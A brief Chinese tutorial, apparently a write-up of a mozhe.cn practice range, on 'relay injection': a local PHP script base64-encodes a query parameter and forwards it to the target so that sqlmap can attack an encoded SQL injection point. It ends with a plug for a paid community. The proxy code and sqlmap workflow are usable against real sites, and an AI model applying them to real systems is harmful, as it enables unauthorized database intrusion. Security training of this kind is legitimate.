一、中转注入介绍
比如受害者网站URL注入点是经过编码的,不能直接结合sqlmap进行漏洞利用,所以本地搭建一个网站,写一个php脚本编码文件,就可以结合sqlmap工具进行测试。
因为,注入点经过复杂编码之后,就不能直接结合sqlmap进行漏洞攻击了。或者sqlmap自己编写tamper脚本进行攻击
二、中转注入复现
目标网站:https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe
访问目标网站,查看目标网站URL,可以看出id值是被base64编码了,sqlmap不能直接注入攻击
那么在本地利用phpstudy搭建一个网站,并写文件zz.php
<?php
$id = base64_encode($_GET['id']);
echo file_get_contents("http://219.153.49.228:40817/show.php?id=$id");
//base64_encode base67编码
//file_get_contents 网络请求
?>
之后访问本地文件zz.php http://127.0.0.1/zz.php?id=1就类似于直接访问http://219.153.49.228:40817/show.php?id=MQo=
接下来利用sqlmap进行攻击
更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
